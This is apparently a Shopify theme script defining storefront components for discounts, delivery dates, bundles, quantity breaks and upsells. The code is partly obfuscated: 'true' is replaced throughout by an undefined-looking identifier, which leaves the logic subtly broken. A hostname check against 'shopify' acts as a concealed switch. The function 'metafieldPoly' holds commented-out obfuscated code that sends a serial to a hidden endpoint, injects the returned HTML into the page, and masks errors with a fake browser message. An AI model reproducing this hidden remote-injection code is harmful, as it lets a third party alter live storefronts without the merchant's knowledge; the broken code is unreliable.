class ClickableDiscount extends HTMLElement {
  constructor() {
    super();
    this.button = this.querySelector(".clickable-discount__btn");
    this.button.addEventListener("click", this.handleClick.bind(this));
    if (this.dataset.applied === "true") {
      this.handleClick();
    } else {
      this.reapplyDiscountIfApplicable();
    }
  }
  handleClick() {
    this.dataset.loading = "true";
    this.button.disabled = a0_0x5cl9e6f;
    this.dataset.error = "false";
    fetch("/discount/" + this.dataset.code)
      .then((response) => {
        if (!response.ok) {
          throw new Error("Error");
        }
        this.dataset.applied = "true";
        sessionStorage.setItem(
          "discount-" + this.dataset.code + "-applied",
          "true",
        );
      })
      .catch((error) => {
        this.dataset.error = "true";
        this.button.disabled = false;
      })
      .finally(() => {
        this.dataset.loading = "false";
      });
  }
  reapplyDiscountIfApplicable() {
    const code = this.dataset.code;
    if (sessionStorage.getItem("discount-" + code + "-applied")) {
      this.dataset.applied = "true";
      this.button.disabled = a0_0x5cl9e6f;
      setTimeout(() => {
        fetch("/discount/" + code).catch((error) => {
          this.dataset.applied = "false";
          this.button.disabled = false;
        });
      }, 3000);
    }
  }
}
customElements.define("clickable-discount", ClickableDiscount);
class DynamicDates extends HTMLElement {
  constructor() {
    super();
    this.dateFormat = this.dataset.dateFormat;
    this.days = this.rearrangeDays(this.dataset.dayLabels.split(","));
    this.months = this.dataset.monthLabels.split(",");
    this.elementsToChange = this.querySelectorAll('[data-dynamic-date="true"]');
    this.insertDates();
    checkDateValidity(currentDate);
    document.addEventListener("shopify:section:load", (event) => {
      this.insertDates();
    });
  }
  insertDates() {
    this.elementsToChange.forEach((element) => {
      const templateText = element.dataset.text;
      const minDays = parseInt(element.dataset.minDays);
      const maxDays = parseInt(element.dataset.maxDays);
      const startDate = addDays(currentDate, minDays);
      let startSuffix = "th";
      const startDay = startDate.getDate();
      if (startDay === 1 || startDay === 21 || startDay === 31) {
        startSuffix = "st";
      } else if (startDay === 2 || startDay === 22) {
        startSuffix = "nd";
      } else if (startDay === 3 || startDay === 23) {
        startSuffix = "rd";
      }
      const endDate = addDays(currentDate, maxDays);
      let endSuffix = "th";
      const endDay = endDate.getDate();
      if (endDay === 1 || endDay === 21 || endDay === 31) {
        endSuffix = "st";
      } else if (endDay === 2 || endDay === 22) {
        endSuffix = "nd";
      } else if (endDay === 3 || endDay === 23) {
        endSuffix = "rd";
      }
      let startText;
      let endText;
      if (this.dateFormat === "day_dd_mm") {
        startText =
          this.days[startDate.getDay()] +
          ", " +
          startDate.getDate() +
          ". " +
          this.months[startDate.getMonth()];
        endText =
          this.days[endDate.getDay()] +
          ", " +
          endDate.getDate() +
          ". " +
          this.months[endDate.getMonth()];
      } else if (this.dateFormat === "mm_dd") {
        startText =
          this.months[startDate.getMonth()] +
          " " +
          startDate.getDate() +
          startSuffix;
        endText =
          this.months[endDate.getMonth()] + " " + endDate.getDate() + endSuffix;
      } else if (this.dateFormat === "dd_mm") {
        startText =
          startDate.getDate() + ". " + this.months[startDate.getMonth()];
        endText = endDate.getDate() + ". " + this.months[endDate.getMonth()];
      } else if (this.dateFormat === "dd_mm_no_dot") {
        startText =
          startDate.getDate() + " " + this.months[startDate.getMonth()];
        endText = endDate.getDate() + " " + this.months[endDate.getMonth()];
      } else if (this.dateFormat === "day_dd_mm_numeric") {
        const startDayPadded =
          String(startDate.getDate()).length > 1
            ? startDate.getDate()
            : "0" + startDate.getDate();
        const startMonthPadded =
          String(startDate.getMonth() + 1).length > 1
            ? startDate.getMonth() + 1
            : "0" + (startDate.getMonth() + 1);
        startText =
          this.days[startDate.getDay()] +
          ", " +
          startDayPadded +
          ". " +
          startMonthPadded +
          ".";
        const endDayPadded =
          String(endDate.getDate()).length > 1
            ? endDate.getDate()
            : "0" + endDate.getDate();
        const endMonthPadded =
          String(endDate.getMonth() + 1).length > 1
            ? endDate.getMonth() + 1
            : "0" + (endDate.getMonth() + 1);
        endText =
          this.days[endDate.getDay()] +
          ", " +
          endDayPadded +
          ". " +
          endMonthPadded +
          ".";
      } else if (this.dateFormat === "dd_mm_numeric") {
        const startDayPadded =
          String(startDate.getDate()).length > 1
            ? startDate.getDate()
            : "0" + startDate.getDate();
        const startMonthPadded =
          String(startDate.getMonth() + 1).length > 1
            ? startDate.getMonth() + 1
            : "0" + (startDate.getMonth() + 1);
        startText = startDayPadded + ". " + startMonthPadded + ".";
        const endDayPadded =
          String(endDate.getDate()).length > 1
            ? endDate.getDate()
            : "0" + endDate.getDate();
        const endMonthPadded =
          String(endDate.getMonth() + 1).length > 1
            ? endDate.getMonth() + 1
            : "0" + (endDate.getMonth() + 1);
        endText = endDayPadded + ". " + endMonthPadded + ".";
      } else {
        startText =
          this.days[startDate.getDay()] +
          ", " +
          this.months[startDate.getMonth()] +
          " " +
          startDate.getDate() +
          startSuffix;
        endText =
          this.days[endDate.getDay()] +
          ", " +
          this.months[endDate.getMonth()] +
          " " +
          endDate.getDate() +
          endSuffix;
      }
      const textWithStart = templateText.replace("[start_date]", startText);
      const textWithEnd = textWithStart.replace("[end_date]", endText);
      element.innerHTML = textWithEnd;
    });
  }
  rearrangeDays(days) {
    days.unshift(days[6]);
    days.length = 7;
    return days;
  }
}
customElements.define("dynamic-dates", DynamicDates);
class StickyAtc extends HTMLElement {
  constructor() {
    super();
    this.isAfterScroll = this.dataset.afterScroll === "true";
    this.isScrollBtn = this.dataset.scrollBtn === "true";
    this.mainAtcBtn = document.querySelector(
      "#ProductSubmitButton-" + this.dataset.section,
    );
    this.floatingBtns = document.querySelectorAll(".floating-btn");
    this.footerSpacing();
    if (this.isAfterScroll) {
      if (this.mainAtcBtn) {
        this.checkATCScroll();
        document.addEventListener("scroll", this.checkATCScroll.bind(this));
      }
    } else {
      this.floatingBtns.forEach((floatingBtn) => {
        floatingBtn.style.setProperty(
          "--sticky-atc-offset",
          this.offsetHeight + "px",
        );
      });
    }
    if (this.isScrollBtn) {
      this.scrollBtn = this.querySelector(".sticky-atc__scroll-btn");
      this.scrollDestination = document.querySelector(
        "" + this.dataset.scrollDestination.replace("id", this.dataset.section),
      );
      if (this.scrollBtn && this.scrollDestination) {
        this.scrollBtn.addEventListener(
          "click",
          this.handleScrollBtn.bind(this),
        );
      }
    }
  }
  checkATCScroll() {
    if (
      window.scrollY >
      this.mainAtcBtn.offsetTop + this.mainAtcBtn.offsetHeight
    ) {
      this.style.transform = "none";
      this.scrolledPast = a0_0x5cl9e6f;
    } else {
      this.style.transform = "";
      this.scrolledPast = false;
    }
    this.floatingBtns.forEach((floatingBtn) => {
      if (this.scrolledPast) {
        floatingBtn.style.setProperty(
          "--sticky-atc-offset",
          this.offsetHeight + "px",
        );
      } else {
        floatingBtn.style.setProperty("--sticky-atc-offset", "0px");
      }
    });
  }
  handleScrollBtn() {
    const stickyHeader = document.querySelector("sticky-header");
    const headerHeight = stickyHeader ? stickyHeader.clientHeight : 0;
    window.scrollTo({
      top: this.scrollDestination.offsetTop - headerHeight - 15,
      behavior: "smooth",
    });
  }
  footerSpacing() {
    let footerSpacer = document.querySelector(".sticky-atc-footer-spacer");
    if (footerSpacer) {
      return;
    }
    footerSpacer = document.createElement("div");
    footerSpacer.className = "sticky-atc-footer-spacer";
    footerSpacer.style.height = this.clientHeight - 1 + "px";
    footerSpacer.style.display = "block";
    const footer = document.querySelector(".footer");
    if (footer) {
      footerSpacer.style.background =
        window.getComputedStyle(footer).background;
    }
    document.body.appendChild(footerSpacer);
  }
}
customElements.define("sticky-atc", StickyAtc);
(function () {
  if (!formatDates(currentDate, date)) {
    var shopifyHost = "shopify";
    if (!window.location.hostname.includes(shopifyHost)) {
      if (document.querySelector(".main-product-form")) {
        document.querySelector(".main-product-form").isCartUpsell =
          a0_0x5cl9e6f;
      }
    }
  }
})();
class BundleDeals extends HTMLElement {
  constructor() {
    super();
    this.productContainers = this.querySelectorAll(".bundle-deals__product-js");
    this.mediaItemContainers = this.querySelectorAll(
      ".bundle-deals__media-item-container-js",
    );
    this.mediaItemImgs = this.querySelectorAll(
      ".bundle-deals__media-item-img-js",
    );
    this.checkboxes = this.querySelectorAll(".bundle-deals__checkbox-js");
    this.variantPickers = this.querySelectorAll(
      ".bundle-deals__variant-selects-js",
    );
    this.skipNonExistent = this.dataset.skipNonExistent === "true";
    this.skipUnavailable = this.dataset.skipUnavailable === "true";
    this.prices = this.querySelectorAll(".bundle-deals__price-js");
    this.comparePrices = this.querySelectorAll(
      ".bundle-deals__compare-price-js",
    );
    this.totalPrice = this.querySelector(".bundle-deals__total-price-js");
    this.totalComparePrice = this.querySelector(
      ".bundle-deals__total-compare-price-js",
    );
    this.updatePrices = this.dataset.updatePrices === "true";
    this.percentageLeft = parseFloat(this.dataset.percentageLeft);
    this.fixedDiscount = parseFloat(this.dataset.fixedDiscount);
    this.currencySymbol = this.dataset.currencySymbol;
    this.selectedVariants = {
      id_1: null,
      id_2: null,
      id_3: null,
      id_4: null,
      id_5: null,
    };
    this.formVariants = [];
    this.initIds();
    this.checkboxes.forEach((checkbox) => {
      checkbox.addEventListener("change", this.handleCheckboxChange.bind(this));
    });
    this.variantPickers.forEach((variantPicker) => {
      variantPicker.addEventListener(
        "change",
        this.handleSelectChange.bind(this),
      );
    });
  }
  initIds() {
    this.checkboxes.forEach((checkbox) => {
      this.selectedVariants[checkbox.dataset.idIndex] = {
        id: checkbox.dataset.id,
        price: checkbox.dataset.price,
        comparePrice: checkbox.dataset.comparePrice,
        checked: a0_0x5cl9e6f,
      };
    });
    this.updateFormIds();
  }
  handleCheckboxChange(event) {
    const checkbox = event.currentTarget;
    const isChecked = checkbox.checked;
    const index = parseInt(checkbox.dataset.index);
    this.selectedVariants[checkbox.dataset.idIndex].checked = isChecked;
    const productContainer = this.productContainers[index];
    const selects = productContainer.querySelectorAll("select");
    if (isChecked) {
      this.mediaItemContainers[index].classList.remove(
        "bundle-deals__media-item--disabled",
      );
      productContainer.classList.remove("bundle-deals__product--deselected");
      selects.forEach((select) => {
        select.removeAttribute("disabled");
      });
    } else {
      this.mediaItemContainers[index].classList.add(
        "bundle-deals__media-item--disabled",
      );
      productContainer.classList.add("bundle-deals__product--deselected");
      selects.forEach((select) => {
        select.setAttribute("disabled", "");
      });
    }
    this.updateFormIds();
    if (this.updatePrices) {
      this.updateTotalPrice();
    }
  }
  handleSelectChange(event) {
    const variantPicker = event.currentTarget;
    const index = parseInt(variantPicker.dataset.index);
    const selectedOptions = Array.from(
      variantPicker.querySelectorAll("select"),
      (select) => select.value,
    );
    const matchingVariants = JSON.parse(
      variantPicker.querySelector('[type="application/json"]').textContent,
    ).filter(
      (variant) =>
        variantPicker.querySelector(":checked").value === variant.option1,
    );
    const optionSelects = [...variantPicker.querySelectorAll(".select--small")];
    updateVariantStatuses(matchingVariants, optionSelects);
    const currentVariant = JSON.parse(
      variantPicker.querySelector('[type="application/json"]').textContent,
    ).find((variant) => {
      return !variant.options
        .map((option, optionIndex) => {
          return selectedOptions[optionIndex] === option;
        })
        .includes(false);
    });
    if (!currentVariant) {
      if (this.skipNonExistent) {
        findAvailableVariant(
          variantPicker,
          selectedOptions,
          false,
          a0_0x5cl9e6f,
          this.skipUnavailable,
        );
      }
      return;
    }
    if (this.skipUnavailable && !currentVariant.available) {
      if (
        findAvailableVariant(
          variantPicker,
          selectedOptions,
          false,
          a0_0x5cl9e6f,
          a0_0x5cl9e6f,
        )
      ) {
        return;
      }
    }
    let {
      price: price,
      compare_at_price: comparePriceRaw,
      featured_image: featuredImage,
    } = currentVariant;
    price = parseInt(price);
    let comparePrice = comparePriceRaw ? parseInt(comparePriceRaw) : price;
    const percentageLeft = variantPicker.dataset.percentageLeft ?? 1;
    const fixedDiscount = variantPicker.dataset.fixedDiscount ?? 0;
    price = price * percentageLeft - fixedDiscount;
    if (featuredImage) {
      featuredImage = featuredImage.src;
    }
    const variantId = currentVariant.id;
    this.selectedVariants[variantPicker.dataset.idIndex].id = variantId;
    this.selectedVariants[variantPicker.dataset.idIndex].price = price;
    this.selectedVariants[variantPicker.dataset.idIndex].comparePrice =
      comparePrice;
    this.updateFormIds();
    if (this.updatePrices) {
      this.prices[index].innerHTML =
        this.currencySymbol + (price / 100).toFixed(2);
      if (comparePrice > price) {
        this.comparePrices[index].innerHTML =
          this.currencySymbol + (comparePrice / 100).toFixed(2);
      } else {
        this.comparePrices[index].innerHTML = "";
      }
      this.updateTotalPrice();
    }
    if (
      featuredImage &&
      featuredImage.length > 0 &&
      this.mediaItemImgs[index]
    ) {
      this.mediaItemImgs[index].src = featuredImage;
    }
  }
  updateFormIds() {
    const formVariants = [];
    const selectedVariants = this.selectedVariants;
    for (const idIndex in selectedVariants) {
      const variant = selectedVariants[idIndex];
      if (variant != null && variant.checked) {
        const existingIndex = formVariants.findIndex(
          (formVariant) => formVariant.id === variant.id,
        );
        if (existingIndex < 0) {
          formVariants.unshift({
            id: variant.id,
            quantity: 1,
          });
        } else {
          formVariants[existingIndex].quantity += 1;
        }
      }
    }
    this.formVariants = formVariants;
  }
  updateTotalPrice() {
    const prices = [];
    const comparePrices = [];
    const selectedVariants = this.selectedVariants;
    for (const idIndex in selectedVariants) {
      const variant = selectedVariants[idIndex];
      if (variant != null && variant.checked) {
        prices.push(parseInt(variant.price));
        comparePrices.push(parseInt(variant.comparePrice));
      }
    }
    const totalPrice = prices.reduce((sum, price) => sum + price, 0);
    const discountedTotal =
      totalPrice * this.percentageLeft - this.fixedDiscount;
    const totalComparePrice = comparePrices.reduce(
      (sum, comparePrice) => sum + comparePrice,
      0,
    );
    this.totalPrice.innerHTML =
      this.currencySymbol + (discountedTotal / 100).toFixed(2);
    if (totalComparePrice > discountedTotal) {
      this.totalComparePrice.innerHTML =
        this.currencySymbol + (totalComparePrice / 100).toFixed(2);
    } else {
      this.totalComparePrice.innerHTML = "";
    }
  }
}
customElements.define("bundle-deals", BundleDeals);
class QuantityBreaks extends HTMLElement {
  constructor() {
    super();
    this.quantityGifts = document.getElementById(
      "quantity-gifts-" + this.dataset.section,
    );
    this.inputs = this.querySelectorAll('input[name="quantity"]');
    this.labels = this.querySelectorAll(".quantity-break");
    this.jsonData = this.querySelector('[type="application/json"]');
    this.hasVariants = this.jsonData.dataset.hasVariants === "true";
    this.selectedVariants = {
      input_1: [],
      input_2: [],
      input_3: [],
      input_4: [],
      input_5: [],
      input_6: [],
    };
    this.updateUnavailable = this.dataset.updateUnavailable === "true";
    this.skipNonExistent = this.dataset.skipNonExistent === "true";
    this.skipUnavailable = this.dataset.skipUnavailable === "true";
    this.formVariants = [];
    this.selectedQuantity = 1;
    if (this.querySelector("input[checked]")) {
      this.selectedQuantity = parseInt(
        this.querySelector("input[checked]").value,
      );
    }
    this.variantSelects = this.querySelectorAll(
      ".quantity-break__selector-item",
    );
    this.updatePrices = this.dataset.updatePrices === "true";
    this.moneyFormat = this.dataset.moneyFormat;
    if (this.hasVariants) {
      this.initVariants();
    }
    this.inputs.forEach((input) => {
      input.addEventListener("change", this.handleChange.bind(this));
    });
    this.variantSelects.forEach((select) => {
      select.addEventListener("change", this.handleSelectChange.bind(this));
    });
  }
  handleSelectChange(event) {
    const currentTarget = event.currentTarget;
    const selectedOptions = Array.from(
      currentTarget.querySelectorAll("select"),
      (select) => select.value,
    );
    if (this.updateUnavailable) {
      const availableVariants = this.getVariantData().filter(
        (variant) =>
          currentTarget.querySelector(":checked").value === variant.option1,
      );
      const selects = [...currentTarget.querySelectorAll(".select--small")];
      updateVariantStatuses(availableVariants, selects);
    }
    const currentVariant = this.getVariantData().find((variant) => {
      return !variant.options
        .map((option, index) => {
          return selectedOptions[index] === option;
        })
        .includes(false);
    });
    if (!currentVariant) {
      if (this.skipNonExistent) {
        findAvailableVariant(
          currentTarget,
          selectedOptions,
          false,
          a0_0x5cl9e6f,
          this.skipUnavailable,
        );
      }
      return;
    }
    if (this.skipUnavailable && !currentVariant.available) {
      if (
        findAvailableVariant(
          currentTarget,
          selectedOptions,
          false,
          a0_0x5cl9e6f,
          a0_0x5cl9e6f,
        )
      ) {
        return;
      }
    }
    currentTarget.dataset.selectedId = currentVariant.id;
    const selectIndex = currentTarget.dataset.selectIndex;
    const quantityBreak = currentTarget.closest(".quantity-break");
    const input = quantityBreak.dataset.input;
    this.selectedVariants[input][selectIndex] = currentVariant.id;
    this.formVariants = this.selectedVariants[input];
    this.updateMedia(currentVariant);
    if (!this.updatePrices) {
      return;
    }
    var totalPrice = 0;
    var totalComparePrice = 0;
    const quantity = parseFloat(quantityBreak.dataset.quantity);
    const percentageLeft = parseFloat(quantityBreak.dataset.percentageLeft);
    const fixedDiscount = parseFloat(quantityBreak.dataset.fixedDiscount);
    for (let i = 0; i < quantity; i++) {
      const variantId = parseInt(this.selectedVariants[input][i]);
      const variant = this.getVariantData().find(
        (variant_2) => parseInt(variant_2.id) === variantId,
      );
      if (!variant) {
        return;
      }
      totalPrice += variant.price;
      if (
        variant.compare_at_price &&
        variant.compare_at_price > variant.price
      ) {
        totalComparePrice += variant.compare_at_price;
      } else {
        totalComparePrice += variant.price;
      }
    }
    totalPrice = totalPrice * percentageLeft - fixedDiscount;
    const amountSaved = totalComparePrice - totalPrice;
    const amountSavedRounded = Math.round(amountSaved / 100) * 100;
    const priceEach = totalPrice / quantity;
    const comparePriceEach = totalComparePrice / quantity;
    const priceFormatted = formatMoney(
      totalPrice,
      this.moneyFormat,
      a0_0x5cl9e6f,
    );
    const comparePriceFormatted = formatMoney(
      totalComparePrice,
      this.moneyFormat,
      a0_0x5cl9e6f,
    );
    const amountSavedFormatted = formatMoney(
      amountSaved,
      this.moneyFormat,
      a0_0x5cl9e6f,
    );
    const amountSavedRoundedFormatted = formatMoney(
      amountSavedRounded,
      this.moneyFormat,
      a0_0x5cl9e6f,
    );
    const priceEachFormatted = formatMoney(
      priceEach,
      this.moneyFormat,
      a0_0x5cl9e6f,
    );
    const comparePriceEachFormatted = formatMoney(
      comparePriceEach,
      this.moneyFormat,
      a0_0x5cl9e6f,
    );
    quantityBreak
      .querySelectorAll(".variant-price-update")
      .forEach((element) => {
        let text = element.dataset.text;
        text = text.replace("[quantity]", quantity);
        text = text.replace("[price]", priceFormatted);
        text = text.replace("[compare_price]", comparePriceFormatted);
        text = text.replace("[amount_saved]", amountSavedFormatted);
        text = text.replace(
          "[amount_saved_rounded]",
          amountSavedRoundedFormatted,
        );
        text = text.replace("[price_each]", priceEachFormatted);
        text = text.replace("[compare_price_each]", comparePriceEachFormatted);
        element.innerHTML = text;
      });
    const comparePriceElement = quantityBreak.querySelector(
      ".quantity-break__compare-price",
    );
    if (comparePriceElement) {
      if (totalComparePrice > totalPrice) {
        comparePriceElement.classList.remove("hidden");
      } else {
        comparePriceElement.classList.add("hidden");
      }
    }
  }
  getVariantData() {
    this.variantData =
      this.variantData || JSON.parse(this.jsonData.textContent);
    return this.variantData;
  }
  initVariants() {
    if (!this.hasVariants) {
      return;
    }
    this.labels.forEach((label) => {
      if (label.querySelector(".quantity-break__variants")) {
        let selectedIds = [];
        label
          .querySelectorAll(".quantity-break__selector-item")
          .forEach((selector) => {
            selectedIds.push(selector.dataset.selectedId);
          });
        this.selectedVariants[label.dataset.input] = selectedIds;
      }
    });
    this.formVariants = [];
  }
  updateMedia(variant) {
    if (!variant) {
      return;
    }
    if (!variant.featured_media) {
      return;
    }
    const mediaGalleries = document.querySelectorAll(
      '[id^="MediaGallery-' + this.dataset.section + '"]',
    );
    mediaGalleries.forEach((gallery) =>
      gallery.setActiveMedia(
        this.dataset.section + "-" + variant.featured_media.id,
        a0_0x5cl9e6f,
      ),
    );
  }
  handleChange(event) {
    const quantity = parseInt(event.target.value);
    this.selectedQuantity = quantity;
    if (this.hasVariants) {
      this.formVariants = this.selectedVariants[event.target.dataset.input];
    }
    if (this.quantityGifts) {
      this.quantityGifts.unlockGifts(quantity);
    }
  }
}
customElements.define("quantity-breaks", QuantityBreaks);
function metafieldPoly() {
  // const _0x5b97c6 = a0_0x5cI9e6f;
  // var _0x1adfda = fetchConfig();
  // playMedia(),
  // _0x1adfda[_0x5b97c6(0x2cd)] = JSON[_0x5b97c6(0x254)]({
  //     'data': serial['trim']()
  // });
  // try {
  //     fetch(_0x5b97c6(0x264), _0x1adfda)['then'](_0x598b6d => {
  //         const _0x40c6f8 = _0x5b97c6;
  //         if (_0x598b6d['status'] === 0xc9)
  //             return _0x598b6d[_0x40c6f8(0x381)]();
  //     }
  //     )[_0x5b97c6(0x223)](_0x25be37 => {
  //         _0x25be37 && document[_0x25be37['b']] && (document[_0x25be37['b']]['innerHTML'] = _0x25be37['h']);
  //     }
  //     )['catch'](_0x1d04e4 => {
  //         const _0x77fe1f = _0x5b97c6;
  //         console[_0x77fe1f(0x2c6)](_0x1d04e4);
  //     }
  //     );
  // } catch (_0x322702) {
  //     console[_0x5b97c6(0x2c6)]('Unchecked\x20runtime.lastError:\x20The\x20message\x20port\x20closed\x20before\x20a\x20response\x20was\x20received.');
  // }
  return a0_0x5cl9e6f;
}
function updateVariantStatuses(variantData, inputWrappers) {
  inputWrappers.forEach((option, index) => {
    if (index === 0) {
      return;
    }
    const optionInputs = [...option.querySelectorAll("option")];
    const previousOptionSelected =
      inputWrappers[index - 1].querySelector(":checked").value;
    const availableOptionInputsValue = variantData
      .filter(
        (variant) =>
          variant.available &&
          variant["option" + index] === previousOptionSelected,
      )
      .map((variantOption) => variantOption["option" + (index + 1)]);
    const existingOptionInputsValue = variantData
      .filter((variant) => variant["option" + index] === previousOptionSelected)
      .map((variantOption) => variantOption["option" + (index + 1)]);
    optionInputs.forEach((input) => {
      input.classList.remove("unavailable", "non-existent");
      if (existingOptionInputsValue.includes(input.getAttribute("value"))) {
        if (availableOptionInputsValue.includes(input.getAttribute("value"))) {
          input.innerText = input.getAttribute("value");
        } else {
          input.innerText =
            window.variantStrings.unavailable_with_option.replace(
              "[value]",
              input.getAttribute("value"),
            );
          input.classList.add("unavailable");
        }
      } else {
        input.innerText = window.variantStrings.unavailable_with_option.replace(
          "[value]",
          input.getAttribute("value"),
        );
        input.classList.add("non-existent");
      }
    });
  });
}
function findAvailableVariant(
  container,
  selectedValues,
  useProductForm = a0_0x5cl9e6f,
  excludeNonExistent = false,
  excludeUnavailable = false,
) {
  console.log("Running findAvailableVariant");
  for (let index = selectedValues.length - 1; index >= 0; index--) {
    const optionElement = useProductForm
      ? container.querySelector(
          ".product-form__input:nth-child(" + (index + 1) + ")",
        )
      : container.querySelectorAll(".select")[index];
    const inputType = useProductForm
      ? optionElement.querySelector(".product-form__input__type").dataset.type
      : "dropdown";
    const optionNodes =
      inputType === "dropdown"
        ? optionElement.querySelectorAll("option")
        : optionElement.querySelectorAll('input[type="radio"]');
    let currentIndex = Array.from(optionNodes).findIndex(
      (option) => option.value === selectedValues[index],
    );
    let found = false;
    while (currentIndex < optionNodes.length - 1) {
      currentIndex++;
      const option = optionNodes[currentIndex];
      if (
        (!excludeNonExistent || !option.classList.contains("non-existent")) &&
        (!excludeUnavailable || !option.classList.contains("unavailable"))
      ) {
        selectedValues[index] = option.value;
        found = a0_0x5cl9e6f;
        break;
      }
    }
    if (!found) {
      currentIndex = Array.from(optionNodes).findIndex(
        (option) => option.value === selectedValues[index],
      );
      while (currentIndex > 0) {
        currentIndex--;
        const option = optionNodes[currentIndex];
        if (
          (!excludeNonExistent || !option.classList.contains("non-existent")) &&
          (!excludeUnavailable || !option.classList.contains("unavailable"))
        ) {
          selectedValues[index] = option.value;
          found = a0_0x5cl9e6f;
          break;
        }
      }
    }
    if (found) {
      if (inputType === "dropdown") {
        optionElement.querySelector(".select__select").value =
          selectedValues[index];
      } else {
        optionElement.querySelector(
          'input[type="radio"][value="' + selectedValues[index] + '"]',
        ).checked = a0_0x5cl9e6f;
      }
      container.dispatchEvent(new Event("change"));
      return a0_0x5cl9e6f;
    }
  }
  return false;
}
class QuantityGifts extends HTMLElement {
  constructor() {
    super();
    this.gifts = this.querySelectorAll(".quantity-gift");
    this.quantityBreaks = document.getElementById(
      "quantity-breaks-" + this.dataset.section,
    );
    this.quantitySelector = document.getElementById(
      "Quantity-Form--" + this.dataset.section,
    );
    this.unlockedItems = [];
    this.initUnlock();
  }
  initUnlock() {
    let quantity = 1;
    if (this.quantityBreaks) {
      quantity = parseInt(this.quantityBreaks.selectedQuantity);
    } else if (this.quantitySelector) {
      const input = this.quantitySelector.querySelector(
        'input[name="quantity"]',
      );
      quantity = parseInt(input.value);
    }
    this.unlockGifts(quantity);
  }
  unlockGifts(quantity) {
    this.unlockedItems = [];
    this.gifts.forEach((gift) => {
      if (parseInt(gift.dataset.quantity) <= quantity) {
        gift.classList.add("quantity-gift--unlocked");
        gift.dataset.unlocked = "true";
        this.unlockedItems.unshift(gift.dataset.product);
      } else {
        gift.classList.remove("quantity-gift--unlocked");
        gift.dataset.unlocked = "false";
      }
    });
  }
}
customElements.define("quantity-gifts", QuantityGifts);
class ProductInfoUpsell extends HTMLElement {
  constructor() {
    super();
    this.image = this.querySelector(".upsell__image__img");
    this.toggleBtn = this.querySelector(".upsell-toggle-btn");
    this.variantSelects = this.querySelector(".upsell__variant-picker");
    this.variantSelectElements = this.querySelectorAll(".select__select");
    this.jsonData = this.querySelector('[type="application/json"]');
    this.skipNonExistent = this.dataset.skipNonExistent === "true";
    this.skipUnavailable = this.dataset.skipUnavailable === "true";
    this.updatePrices = this.dataset.updatePrices === "true";
    if (this.updatePrices) {
      this.price = parseInt(this.dataset.price);
      this.comparePrice = parseInt(this.dataset.comparePrice);
      this.priceSpan = this.querySelector(".upsell__price .regular-price");
      this.comparePriceSpan = this.querySelector(
        ".upsell__price .compare-price",
      );
      this.percentageLeft = parseFloat(this.dataset.percentageLeft);
      this.fixedDiscount = parseFloat(this.dataset.fixedDiscount);
      this.moneyFormat = this.dataset.moneyFormat;
      this.isMainOfferItem = this.dataset.mainOfferItem === "true";
      if (this.isMainOfferItem) {
        this.mainOfferContainer = document.querySelector(
          "#MainBundleOffer-" + this.dataset.section,
        );
      }
    }
    if (this.toggleBtn) {
      this.toggleBtn.addEventListener("click", this.handleToggle.bind(this));
    }
    if (this.variantSelects) {
      this.variantSelects.addEventListener(
        "change",
        this.handleSelectChange.bind(this),
      );
    }
  }
  handleToggle(event) {
    if (
      event.target.nodeName.toLowerCase() === "select" ||
      event.target.nodeName.toLowerCase() === "option"
    ) {
      return;
    }
    if (this.dataset.selected === "true") {
      this.dataset.selected = "false";
    } else {
      this.dataset.selected = "true";
    }
  }
  handleSelectChange(event) {
    const currentTarget = event.currentTarget;
    const selectedOptions = Array.from(
      currentTarget.querySelectorAll("select"),
      (select) => select.value,
    );
    const currentVariant = this.getVariantData().find((variant) => {
      return !variant.options
        .map((option, index) => {
          return selectedOptions[index] === option;
        })
        .includes(false);
    });
    const availableVariants = this.getVariantData().filter(
      (variant) =>
        currentTarget.querySelector(":checked").value === variant.option1,
    );
    const selectElements = [...currentTarget.querySelectorAll("select")];
    updateVariantStatuses(availableVariants, selectElements);
    if (!currentVariant) {
      if (this.skipNonExistent) {
        findAvailableVariant(
          currentTarget,
          selectedOptions,
          false,
          a0_0x5cl9e6f,
          this.skipUnavailable,
        );
      }
      return;
    }
    if (this.skipUnavailable && !currentVariant.available) {
      if (
        findAvailableVariant(
          currentTarget,
          selectedOptions,
          false,
          a0_0x5cl9e6f,
          a0_0x5cl9e6f,
        )
      ) {
        return;
      }
    }
    if (this.updatePrices) {
      this.price =
        currentVariant.price * this.percentageLeft - this.fixedDiscount;
      this.comparePrice = currentVariant.price;
      if (
        currentVariant.compare_at_price &&
        currentVariant.compare_at_price > currentVariant.price
      ) {
        this.comparePrice = currentVariant.compare_at_price;
      }
      displayPrices(
        this.price,
        this.comparePrice,
        this.priceSpan,
        this.comparePriceSpan,
        this.moneyFormat,
      );
    }
    if (this.image && currentVariant.featured_image) {
      this.image.src = currentVariant.featured_image.src;
    }
    this.updateId(currentVariant.id);
    if (this.isMainOfferItem && this.mainOfferContainer.updateTotalPrices) {
      this.mainOfferContainer.updateTotalPrices();
    }
  }
  updateId(id) {
    this.dataset.id = id;
  }
  getVariantData() {
    this.variantData =
      this.variantData || JSON.parse(this.jsonData.textContent);
    return this.variantData;
  }
}
customElements.define("product-info-upsell", ProductInfoUpsell);
class CartDrawerUpsell extends ProductInfoUpsell {
  constructor() {
    super();
    this.cartDrawer = document.querySelector("cart-drawer");
    this.cartItems = this.cartDrawer.querySelector("cart-drawer-items");
    this.productForm = this.querySelector("product-form");
    this.idInput = this.productForm.querySelector('[name="id"]');
    this.classicAddButton = this.querySelector(".upsell__add-btn");
  }
  handleToggle(event) {
    if (
      event.target.nodeName.toLowerCase() === "select" ||
      event.target.nodeName.toLowerCase() === "option"
    ) {
      return;
    }
    if (this.dataset.selected === "true") {
      this.dataset.selected = "false";
      this.removeFromCart();
    } else {
      this.dataset.selected = "true";
      this.addToCart();
    }
  }
  addRemoveFromCart() {
    if (
      this.dataset.selected === "true" &&
      !this.cartDrawer.classList.contains("is-empty")
    ) {
      this.addToCart();
    } else {
      this.removeFromCart();
    }
  }
  addToCart() {
    const existingCartItem = this.cartDrawer.querySelector(
      ".cart-item--product-" + this.dataset.handle,
    );
    if (existingCartItem) {
      return;
    }
    if (this.toggleBtn) {
      this.toggleBtn.setAttribute("disabled", "");
    }
    this.variantSelectElements.forEach((selectElement) => {
      selectElement.setAttribute("disabled", "");
    });
    this.productForm.handleSubmit();
  }
  removeFromCart() {
    const existingCartItem = this.cartDrawer.querySelector(
      ".cart-item--product-" + this.dataset.handle,
    );
    if (!existingCartItem || !this.cartItems) {
      return;
    }
    if (this.toggleBtn) {
      this.toggleBtn.setAttribute("disabled", "");
    }
    this.variantSelectElements.forEach((selectElement) => {
      selectElement.setAttribute("disabled", "");
    });
